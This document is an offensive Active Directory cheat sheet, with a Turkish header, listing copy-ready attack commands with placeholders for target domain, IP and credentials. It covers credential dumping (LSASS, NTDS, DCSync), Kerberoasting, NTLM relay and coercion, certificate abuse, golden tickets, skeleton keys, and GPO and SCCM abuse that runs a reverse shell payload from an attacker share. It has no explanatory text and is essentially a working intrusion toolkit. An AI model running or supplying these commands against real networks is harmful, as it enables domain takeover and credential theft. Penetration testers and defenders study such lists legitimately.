Cheat-Sheet · Komut Matrisi
1119 komut · port / phase / platform / tool / exam ile filtrele. Üstten hedefini gir, hepsi otomatik ikame edilir; kopyala çalışır komutu verir.
bloodhound-python -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' -ns {{DC_IP}} -c All --zip nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' -M daclread -o TARGET_DN='CN={{USER}},CN=Users,DC=...' ACTION=read bloodyAD --host {{DC_IP}} -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' get writable bloodyAD --host {{DC_IP}} -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' set password 'TARGET_USER' 'Newp@ss123!' net rpc password 'TARGET_USER' 'Newp@ss123!' -U '{{DOMAIN}}/{{USER}}%{{PASS}}' -S {{DC_HOST}} bloodyAD --host {{DC_IP}} -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' add groupMember 'TARGET_GROUP' '{{USER}}' net rpc group addmem 'TARGET_GROUP' '{{USER}}' -U '{{DOMAIN}}/{{USER}}%{{PASS}}' -S {{DC_HOST}} certipy-ad shadow auto -u {{USER}}@{{DOMAIN}} -p '{{PASS}}' -account 'TARGET_USER' -dc-ip {{DC_IP}} pywhisker -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' --target 'TARGET_USER' --action add --dc-ip {{DC_IP}} targetedKerberoast.py -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' --dc-ip {{DC_IP}} Set-DomainObject -Identity 'TARGET_USER' -Set @{serviceprincipalname='fake/ROAST'}; Get-DomainSPNTicket -Identity 'TARGET_USER' impacket-dacledit -action 'write' -rights 'DCSync' -principal '{{USER}}' -target-dn 'DC=...,DC=...' '{{DOMAIN}}/{{USER}}:{{PASS}}' -dc-ip {{DC_IP}} bloodyAD --host {{DC_IP}} -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' add dcsync '{{USER}}' impacket-owneredit -action write -new-owner '{{USER}}' -target 'TARGET_USER' '{{DOMAIN}}/{{USER}}:{{PASS}}' -dc-ip {{DC_IP}} impacket-dacledit -action 'write' -rights 'FullControl' -principal '{{USER}}' -target 'TARGET_USER' '{{DOMAIN}}/{{USER}}:{{PASS}}' -dc-ip {{DC_IP}} nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' --gmsa bloodyAD --host {{DC_IP}} -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' get object 'GMSA01$' --attr msDS-ManagedPassword Add-DomainObjectAcl -TargetIdentity 'DC=...,DC=...' -PrincipalIdentity '{{USER}}' -Rights DCSync certipy find -u {{USER}}@{{DOMAIN}} -p {{PASS}} -dc-ip {{DC_IP}} -vulnerable -stdout certipy req -u {{USER}}@{{DOMAIN}} -p {{PASS}} -dc-ip {{DC_IP}} -ca 'CA-NAME' -template 'VulnTemplate' -upn administrator@{{DOMAIN}} certipy auth -pfx administrator.pfx -dc-ip {{DC_IP}} certipy auth -pfx administrator.pfx -dc-ip {{DC_IP}} -domain {{DOMAIN}} -username administrator impacket-ntlmrelayx -t http://{{RHOST}}/certsrv/certfnsh.asp -smb2support --adcs --template DomainController certipy auth -pfx administrator.pfx -ldap-shell -dc-ip {{DC_IP}} passthecert.py -action whoami -crt user.crt -key user.key -domain {{DOMAIN}} -dc-ip {{DC_IP}} impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile users.txt -no-pass -format hashcat -outputfile asrep.hash impacket-GetNPUsers {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -format hashcat -outputfile asrep.hash nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --asreproast asrep.hash Rubeus.exe asreproast /format:hashcat /outfile:asrep.hash /nowrap hashcat -m 18200 asrep.hash {{WORDLIST}} -r /usr/share/hashcat/rules/best64.rule Get-DomainUser -PreauthNotRequired -Properties samaccountname,useraccountcontrol | fl curl -L https://ghst.ly/getbhce -o docker-compose.yml && docker compose up -d sudo neo4j start && bloodhound --no-sandbox bloodhound-python -c All -u '{{USER}}' -p '{{PASS}}' -d {{DOMAIN}} -ns {{DC_IP}} --zip bloodhound-python -c All,LoggedOn -u '{{USER}}' -p '{{PASS}}' -d {{DOMAIN}} -ns {{DC_IP}} -dc {{DC_HOST}} --kerberos bloodhound-python -c All -u '{{USER}}' --hashes :{{NTHASH}} -d {{DOMAIN}} -ns {{DC_IP}} --zip SharpHound.exe -c All --zipfilename loot SharpHound.exe -c DCOnly --ldapusername '{{USER}}' --ldappassword '{{PASS}}' SharpHound.exe -c All,LoggedOn -d {{DOMAIN}} --domaincontroller {{DC_IP}} --collectionmethod Session,ACL nxc ldap {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --bloodhound -c All --dns-server {{DC_IP}} MATCH p=shortestPath((u:User {owned:true})-[*1..]->(g:Group {name:'DOMAIN ADMINS@{{DOMAIN}}'})) RETURN p MATCH (u:User)-[r:GenericAll|GenericWrite|WriteDacl|WriteOwner|Owns]->(t) WHERE u.owned=true RETURN u,r,t MATCH (c:Computer) WHERE c.unconstraineddelegation=true RETURN c.name nxc smb {{DC_IP}} -u '' -p '' --shares nxc smb {{DC_IP}} -u guest -p '' --rid-brute 10000 kerbrute userenum -d {{DOMAIN}} --dc {{DC_IP}} {{WORDLIST}} impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile users.txt -no-pass -format hashcat nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -outputfile spns.hash bloodhound-python -d {{DOMAIN}} -u {{USER}} -p {{PASS}} -ns {{DC_IP}} -c All --zip impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}} impacket-psexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} impacket-ntlmrelayx -t ldaps://{{DC_IP}} -smb2support --delegate-access impacket-ntlmrelayx -t ldap://{{DC_IP}} --escalate-user {{USER}} -smb2support impacket-ntlmrelayx -t http://{{RHOST}}/certsrv/certfnsh.asp -smb2support --adcs --template DomainController petitpotam.py -u {{USER}} -p {{PASS}} -d {{DOMAIN}} {{LHOST}} {{DC_IP}} printerbug.py {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} {{LHOST}} coercer coerce -u {{USER}} -p {{PASS}} -d {{DOMAIN}} -t {{DC_IP}} -l {{LHOST}} dfscoerce.py -u {{USER}} -p {{PASS}} -d {{DOMAIN}} {{LHOST}} {{DC_IP}} impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator -dc-ip {{DC_IP}} '{{DOMAIN}}/ATTACK$:Attack123!' hashcat -m 18200 asrep.hash {{WORDLIST}} -r /usr/share/hashcat/rules/best64.rule hashcat -m 13100 kerberoast.hash {{WORDLIST}} -r /usr/share/hashcat/rules/best64.rule hashcat -m 1000 ntlm.txt {{WORDLIST}} -r /usr/share/hashcat/rules/OneRuleToRuleThemAll.rule hashcat -m 5600 netntlmv2.txt {{WORDLIST}} -r /usr/share/hashcat/rules/best64.rule hashcat -m 13100 kerberoast.hash {{WORDLIST}} --force --status --status-timer=10 -O -w 3 hashcat -m 13100 kerberoast.hash --show john --format=krb5tgs --wordlist={{WORDLIST}} kerberoast.hash hashcat -m 1000 ntlm.txt -a 3 ?u?l?l?l?l?d?d?d?d nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} -M gpp_password nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} -M gpp_autologin impacket-Get-GPPPassword -dc-ip {{DC_IP}} {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_HOST}} smbclient //{{DC_IP}}/SYSVOL -U '{{DOMAIN}}/{{USER}}%{{PASS}}' -c 'recurse ON; prompt OFF; mget *' gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' nxc smb {{RHOST}} -u {{USER}} -p {{PASS}} --local-auth --lsa nxc smb {{RHOST}} -u {{USER}} -p {{PASS}} --local-auth --sam impacket-secretsdump {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} nxc smb {{RHOSTS}} -u {{USER}} -p {{PASS}} --spider C\$ --content --pattern password pass cpassword impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} impacket-secretsdump -just-dc-ntlm {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} impacket-secretsdump -just-dc-user {{DOMAIN}}/krbtgt {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} impacket-secretsdump -just-dc -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{DC_IP}} nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} --ntds nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} --ntds --user krbtgt mimikatz # lsadump::dcsync /domain:{{DOMAIN}} /user:krbtgt mimikatz # lsadump::dcsync /domain:{{DOMAIN}} /user:Administrator Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity {{USER}} -Rights DCSync nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --trusted-for-delegation Get-DomainUser -TrustedToAuth -Properties samaccountname,msds-allowedtodelegateto; Get-DomainComputer -TrustedToAuth -Properties dnshostname,msds-allowedtodelegateto ldapsearch -x -H ldap://{{DC_IP}} -D "{{USER}}@{{DOMAIN}}" -w '{{PASS}}' -b "DC={{DOMAIN}},DC=local" "(msDS-AllowedToDelegateTo=*)" sAMAccountName msDS-AllowedToDelegateTo userAccountControl impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator '{{DOMAIN}}/{{USER}}:{{PASS}}' impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator -hashes :{{NTHASH}} '{{DOMAIN}}/{{USER}}' KRB5CCNAME=Administrator@cifs_{{DC_HOST}}.ccache impacket-psexec -k -no-pass {{DOMAIN}}/Administrator@{{DC_HOST}} Rubeus.exe s4u /user:{{USER}} /rc4:{{NTHASH}} /impersonateuser:Administrator /msdsspn:cifs/{{DC_HOST}} /ptt Rubeus.exe s4u /user:{{USER}} /rc4:{{NTHASH}} /impersonateuser:Administrator /msdsspn:cifs/{{DC_HOST}} /altservice:host,ldap,http,wsman /ptt nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --trusted-for-delegation Get-DomainComputer -Unconstrained -Properties dnshostname,useraccountcontrol ldapsearch -x -H ldap://{{DC_IP}} -D "{{USER}}@{{DOMAIN}}" -w '{{PASS}}' -b "DC={{DOMAIN}},DC=local" "(userAccountControl:1.2.840.113556.1.4.803:=524288)" sAMAccountName dNSHostName Rubeus.exe monitor /interval:5 /filteruser:{{DC_HOST}}$ /nowrap Rubeus.exe dump /service:krbtgt /nowrap impacket-printerbug '{{DOMAIN}}/{{USER}}:{{PASS}}'@{{DC_IP}} {{LHOST}} impacket-petitpotam -d {{DOMAIN}} -u {{USER}} -p {{PASS}} {{LHOST}} {{DC_IP}} Rubeus.exe ptt /ticket:doIF...base64TGT... lsadump::dcsync /domain:{{DOMAIN}} /user:{{DOMAIN}}\krbtgt KRB5CCNAME=dc.ccache impacket-secretsdump -k -no-pass '{{DOMAIN}}/{{DC_HOST}}$@{{DC_HOST}}' -just-dc-user krbtgt nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} -d {{DOMAIN}} --query "(memberOf=CN=DnsAdmins,CN=Users,DC=domain,DC=local)" "sAMAccountName" net group "DnsAdmins" /domain msfvenom -p windows/x64/exec CMD='net group "Domain Admins" {{USER}} /add /domain' -f dll -o /tmp/dns_plugin.dll impacket-smbserver share /tmp/ -smb2support dnscmd {{DC_HOST}} /config /serverlevelplugindll \\{{LHOST}}\share\dns_plugin.dll dnscmd {{DC_HOST}} /config /serverlevelplugindll \\{{LHOST}}\share\dns_plugin.dll /s sc.exe \\{{DC_HOST}} stop dns && sc.exe \\{{DC_HOST}} start dns reg query \\{{DC_HOST}}\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll nxc smb {{DC_IP}} -u {{USER}} -H {{NTHASH}} -d {{DOMAIN}} -x "net group 'Domain Admins'" dnscmd {{DC_HOST}} /config /serverlevelplugindll nxc smb {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --users nxc smb {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --groups nxc smb {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --pass-pol nxc ldap {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --users nxc ldap {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --password-not-required nxc ldap {{DC_IP}} -u '{{USER}}' -H {{NTHASH}} --trusted-for-delegation ldapsearch -x -H ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC=corp,DC=local' '(objectClass=user)' sAMAccountName description memberOf ldapsearch -x -H ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC=corp,DC=local' '(&(objectClass=user)(servicePrincipalName=*))' sAMAccountName servicePrincipalName rpcclient -U '{{DOMAIN}}/{{USER}}%{{PASS}}' {{DC_IP}} -c 'enumdomusers' rpcclient -U '{{DOMAIN}}/{{USER}}%{{PASS}}' {{DC_IP}} -c 'querygroupmem 0x200; queryuser 0x1f4' enum4linux-ng -u '{{USER}}' -p '{{PASS}}' -A {{DC_IP}} pywerview get-netuser -u '{{USER}}' -p '{{PASS}}' -d {{DOMAIN}} --dc-ip {{DC_IP}} impacket-GetADUsers -all -dc-ip {{DC_IP}} '{{DOMAIN}}/{{USER}}:{{PASS}}' Get-DomainUser -SPN -Properties samaccountname,serviceprincipalname | fl Get-DomainGroupMember -Identity 'Domain Admins' -Recurse ADSearch.exe --domain {{DOMAIN}} --search '(&(objectCategory=user)(servicePrincipalName=*))' --attributes samaccountname,serviceprincipalname ADExplorer.exe -snapshot "" C:\Temp\snap.dat {{DC_HOST}} nxc smb {{DC_IP}} -u '' -p '' --shares nxc smb {{DC_IP}} -u guest -p '' --rid-brute 10000 enum4linux-ng -A {{DC_IP}} rpcclient -U '' -N {{DC_IP}} rpcclient -U '' -N {{DC_IP}} -c 'enumdomusers' rpcclient -U '' -N {{DC_IP}} -c 'querydominfo;getdompwinfo' impacket-lookupsid {{DOMAIN}}/guest@{{DC_IP}} -no-pass ldapsearch -x -H ldap://{{DC_IP}} -s base namingcontexts ldapsearch -x -H ldap://{{DC_IP}} -b 'DC=corp,DC=local' '(objectClass=user)' sAMAccountName nxc ldap {{DC_IP}} -u '' -p '' --query '(objectClass=domain)' '' smbclient -L //{{DC_IP}} -N bloodhound-python -u {{USER}} -p {{PASS}} -d {{DOMAIN}} -dc {{DC_HOST}} -ns {{DC_IP}} -c All nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} -d {{DOMAIN}} -M maq && nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --gmsa Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match 'WriteProperty|GenericWrite|WriteDacl' } Get-DomainOU | Get-DomainComputer -SearchBase $_.distinguishedname; Get-DomainGPO -Identity "{GPO-GUID}" | select gplink,displayname python3 pygpoabuse.py {{DOMAIN}}/{{USER}}:{{PASS}} -gpo-id "{GPO-GUID}" -command "net group 'Domain Admins' {{USER}} /add /domain" -taskname "Update" -description "benign" python3 pygpoabuse.py {{DOMAIN}}/{{USER}} -hashes :{{NTHASH}} -gpo-id "{GPO-GUID}" -command "{{LHOST}}\share\rev.exe" -user SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author {{DOMAIN}}\{{USER}} --Command "cmd.exe" --Arguments "/c net group 'Domain Admins' {{USER}} /add /domain" --GPOName "VulnerableGPO" SharpGPOAbuse.exe --AddUserTask --TaskName "Update" --Author {{DOMAIN}}\{{USER}} --Command "cmd.exe" --Arguments "/c {{LHOST}}\share\rev.exe" --GPOName "VulnerableGPO" New-GPOImmediateTask -TaskName Update -GPODisplayName "VulnerableGPO" -CommandArguments '-c "net group ..."' -Force gpupdate /force nxc smb {{DC_IP}} -u {{USER}} -H {{NTHASH}} -x "net group 'Domain Admins'" impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -outputfile kerberoast.hash impacket-GetUserSPNs {{DOMAIN}}/{{USER}} -hashes :{{NTHASH}} -dc-ip {{DC_IP}} -request -outputfile kerberoast.hash nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --kerberoasting kerberoast.hash impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} Rubeus.exe kerberoast /outfile:kerberoast.hash /nowrap Rubeus.exe kerberoast /user:{{USER}} /nowrap targetedKerberoast.py -v -d {{DOMAIN}} -u {{USER}} -p {{PASS}} --dc-ip {{DC_IP}} hashcat -m 13100 kerberoast.hash {{WORDLIST}} -r /usr/share/hashcat/rules/best64.rule nxc ldap {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --laps nxc smb {{RHOST}} -u 'administrator' -p '{{PASS}}' --local-auth pyLAPS.py --action get -d {{DOMAIN}} -u '{{USER}}' -p '{{PASS}}' --dc-ip {{DC_IP}} laps.py -u '{{USER}}' -p '{{PASS}}' -d {{DOMAIN}} -l {{DC_IP}} ldapsearch -x -H ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC=corp,DC=local' '(ms-Mcs-AdmPwd=*)' ms-Mcs-AdmPwd sAMAccountName ldapsearch -x -H ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC=corp,DC=local' '(msLAPS-EncryptedPassword=*)' msLAPS-Password sAMAccountName Get-DomainObject -Identity '{{RHOST}}' -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime evil-winrm -i {{RHOST}} -u administrator -p '{{PASS}}' nxc smb {{RHOSTS}} -u {{USER}} -H {{NTHASH}} --local-auth nxc smb {{RHOST}} -u {{USER}} -H {{NTHASH}} -x 'whoami /all' impacket-psexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} impacket-wmiexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} impacket-smbexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} impacket-atexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} 'whoami' impacket-dcomexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}} impacket-getTGT -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}} -dc-ip {{DC_IP}} export KRB5CCNAME={{USER}}.ccache; impacket-wmiexec -k -no-pass {{DOMAIN}}/{{USER}}@{{DC_HOST}} KRB5CCNAME={{USER}}.ccache nxc smb {{DC_HOST}} -k --use-kcache -x 'whoami' Rubeus.exe asktgt /user:{{USER}} /rc4:{{NTHASH}} /domain:{{DOMAIN}} /dc:{{DC_IP}} /ptt Rubeus.exe ptt /ticket:ticket.kirbi sekurlsa::pth /user:{{USER}} /domain:{{DOMAIN}} /ntlm:{{NTHASH}} /run:powershell.exe nxc rdp {{RHOST}} -u {{USER}} -H {{NTHASH}} xfreerdp /v:{{RHOST}} /u:{{USER}} /pth:{{NTHASH}} /d:{{DOMAIN}} +clipboard impacket-psexec -k -no-pass {{DOMAIN}}/{{USER}}@{{DC_HOST}} nxc smb {{RHOST}} -u {{USER}} -p {{PASS}} -M lsassy tasklist /fi "imagename eq lsass.exe" rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> C:\Windows\Temp\lsass.dmp full procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp nanodump.x64.exe --write C:\Windows\Temp\lsass.dmp pypykatz lsa minidump C:/loot/lsass.dmp mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords nmap -Pn -p 88,135,139,389,445,464,636,3268,3269,5985 -sV --script=ldap-rootdse {{DC_IP}} nxc smb {{DC_IP}} echo '{{DC_IP}} {{DC_HOST}} {{DOMAIN}}' | sudo tee -a /etc/hosts sudo ntpdate {{DC_IP}} nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} --shares bloodhound-python -d {{DOMAIN}} -u {{USER}} -p {{PASS}} -ns {{DC_IP}} -c All --zip impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} nxc mssql {{RHOSTS}} -u {{USER}} -p '{{PASS}}' --local-auth nxc mssql {{RHOST}} -u {{USER}} -p '{{PASS}}' -q 'SELECT @@version; SELECT IS_SRVROLEMEMBER(''sysadmin'')' impacket-mssqlclient {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} -windows-auth enable_xp_cmdshell nxc mssql {{RHOST}} -u {{USER}} -p '{{PASS}}' -X 'whoami' --local-auth EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami'; SELECT SYSTEM_USER; EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin'); SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; EXEC sp_linkedservers; SELECT srvname, isremote FROM sysservers; EXEC ('SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER(''sysadmin'')') AT [LINKED\SQL]; EXEC ('EXEC sp_configure ''show advanced options'',1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'',1; RECONFIGURE; EXEC xp_cmdshell ''whoami''') AT [LINKED\SQL]; nxc mssql {{RHOST}} -u {{USER}} -p '{{PASS}}' -M mssql_priv EXEC master..xp_dirtree '\\{{LHOST}}\share', 1, 1; responder -I {{INTERFACE}} -wv impacket-ntlmrelayx -t smb://{{RHOST}} -smb2support --no-http-server -i EXEC master..xp_subdirs '\\{{LHOST}}\share'; vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit reg save HKLM\SYSTEM C:\Windows\Temp\system.hive diskshadow /s C:\Windows\Temp\ds.txt ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\ifm" q q impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL impacket-secretsdump -ntds ntds.dit -system system.hive -security security.hive LOCAL nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} --ntds vss lsadump::dcsync /domain:{{DOMAIN}} /user:krbtgt privilege::debug; misc::skeleton lsadump::lsa /inject /name:krbtgt token::elevate; lsadump::sam New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name DsrmAdminLogonBehavior -Value 2 -PropertyType DWORD -Force misc::memssp lsadump::dcshadow /object:CN=target,CN=Users,DC=corp,DC=local /attribute:SIDHistory /value:S-1-5-21-...-519 Add-DomainObjectAcl -TargetIdentity "DC={{DOMAIN}}" -PrincipalIdentity {{USER}} -Rights DCSync Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC={{DOMAIN}}' -PrincipalIdentity {{USER}} -Rights All nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} -M ntdsutil impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} responder -I {{INTERFACE}} -wd responder -I {{INTERFACE}} -A grep -ri 'NTLMv2' /usr/share/responder/logs/ ; ls -la /usr/share/responder/logs/ hashcat -m 5600 hashes.txt {{WORDLIST}} mitm6 -d {{DOMAIN}} -i {{INTERFACE}} impacket-ntlmrelayx -6 -t ldaps://{{DC_IP}} -wh attacker-wpad --delegate-access nxc smb {{RHOSTS}} --gen-relay-list relay_targets.txt nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} -M maq impacket-addcomputer -computer-name 'FAKE01$' -computer-pass 'Fake123!' -dc-host {{DC_HOST}} -domain-netbios {{DOMAIN}} '{{DOMAIN}}/{{USER}}:{{PASS}}' impacket-rbcd -delegate-from 'FAKE01$' -delegate-to '{{DC_HOST}}$' -action write '{{DOMAIN}}/{{USER}}:{{PASS}}' impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator '{{DOMAIN}}/FAKE01$:Fake123!' KRB5CCNAME=Administrator@cifs_{{DC_HOST}}.ccache impacket-psexec -k -no-pass {{DOMAIN}}/Administrator@{{DC_HOST}} Set-DomainRBCD -Identity {{DC_HOST}} -DelegateFrom 'FAKE01$' Rubeus.exe hash /password:Fake123! /user:FAKE01$ /domain:{{DOMAIN}} Rubeus.exe s4u /user:FAKE01$ /aes256:<AES256_KEY> /impersonateuser:Administrator /msdsspn:cifs/{{DC_HOST}} /ptt nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --delegate Administrator python3 sccmhunter.py find -u {{USER}} -p {{PASS}} -d {{DOMAIN}} -dc-ip {{DC_IP}} python3 sccmhunter.py smb -u {{USER}} -p {{PASS}} -d {{DOMAIN}} -dc-ip {{DC_IP}} -save python3 sccmhunter.py http -u {{USER}} -p {{PASS}} -d {{DOMAIN}} -dc-ip {{DC_IP}} --auto SharpSCCM.exe get secrets -u {{USER}} -p {{PASS}} python3 pxethief.py 1 {{RHOST}} impacket-ntlmrelayx -t http://{{RHOST}}/ccm_system_windowsauth/request -smb2support --adcs python3 sccmhunter.py admin -u {{USER}} -p {{PASS}} -ip {{RHOST}} SCCMHunter#> get_user {{USER}}; add_admin {{USER}} S-1-5-21-... SharpSCCM.exe exec -d "All Systems" -p "reverse_shell" --run-as-system nxc smb {{RHOSTS}} -u {{USER}} -H {{NTHASH}} -d {{DOMAIN}} kerbrute passwordspray -d {{DOMAIN}} --dc {{DC_IP}} users.txt '{{PASS}}' nxc smb {{DC_IP}} -u users.txt -p '{{PASS}}' --continue-on-success nxc ldap {{DC_IP}} -u users.txt -p '{{PASS}}' --continue-on-success nxc smb {{DC_IP}} -u '{{USER}}' -p passwords.txt --continue-on-success nxc smb {{DC_IP}} -u '' -p '' --pass-pol kerbrute passwordspray -d {{DOMAIN}} --dc {{DC_IP}} users.txt '{{PASS}}' --safe nxc smb {{DC_IP}} -u users.txt -H {{NTHASH}} --continue-on-success Invoke-PasswordSprayOWA -ExchHostname {{RHOST}} -UserList users.txt -Password '{{PASS}}' o365spray --spray -U users.txt -p '{{PASS}}' --domain {{DOMAIN}} Invoke-MSOLSpray -UserList users.txt -Password '{{PASS}}' impacket-ticketer -nthash {{NTHASH}} -domain-sid {{DOMAIN_SID}} -domain {{DOMAIN}} Administrator impacket-ticketer -aesKey {{NTHASH}} -domain-sid {{DOMAIN_SID}} -domain {{DOMAIN}} -user-id 500 -groups 512,513,518,519,520 Administrator impacket-ticketer -nthash {{NTHASH}} -domain-sid {{DOMAIN_SID}} -domain {{DOMAIN}} -spn cifs/{{DC_HOST}} Administrator export KRB5CCNAME=$(pwd)/Administrator.ccache; impacket-psexec -k -no-pass {{DOMAIN}}/Administrator@{{DC_HOST}} nxc smb {{DC_HOST}} --use-kcache -x "whoami" Rubeus.exe golden /rc4:{{NTHASH}} /domain:{{DOMAIN}} /sid:{{DOMAIN_SID}} /user:Administrator /ptt Rubeus.exe silver /service:cifs/{{DC_HOST}} /rc4:{{NTHASH}} /sid:{{DOMAIN_SID}} /domain:{{DOMAIN}} /user:Administrator /ptt Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /krbkey:{{NTHASH}} /nowrap kerberos::golden /user:Administrator /domain:{{DOMAIN}} /sid:{{DOMAIN_SID}} /krbtgt:{{NTHASH}} /id:500 /groups:512,513,518,519,520 /ptt kerberos::golden /user:Administrator /domain:{{DOMAIN}} /sid:{{DOMAIN_SID}} /target:{{DC_HOST}} /service:cifs /rc4:{{NTHASH}} /ptt lsadump::dcsync /domain:{{DOMAIN}} /user:krbtgt impacket-getPac -targetUser Administrator {{DOMAIN}}/{{USER}}:{{PASS}} Get-DomainTrust -Domain {{DOMAIN}} Get-DomainTrustMapping nltest /domain_trusts /all_trusts nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} -M enum_trusts impacket-ticketer -nthash {{NTHASH}} -domain-sid {{DOMAIN_SID}} -domain child.{{DOMAIN}} -extra-sid S-1-5-21-PARENTSID-519 Administrator kerberos::golden /user:Administrator /domain:child.{{DOMAIN}} /sid:{{DOMAIN_SID}} /krbtgt:{{NTHASH}} /sids:S-1-5-21-PARENTSID-519 /ptt impacket-raiseChild {{DOMAIN}}/{{USER}}:{{PASS}} impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator {{DOMAIN}}/{{USER}}:{{PASS}} nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --gmsa python3 gMSADumper.py -u {{USER}} -p {{PASS}} -d {{DOMAIN}} GoldenGMSA.exe compute --sid {{DOMAIN_SID}} --kdskey <KDSRootKeyB64> impacket-mssqlclient {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} -windows-auth enum_links EXEC ('EXEC sp_configure ''xp_cmdshell'',1; RECONFIGURE; EXEC xp_cmdshell ''whoami'';') AT [LINKED\SERVER] 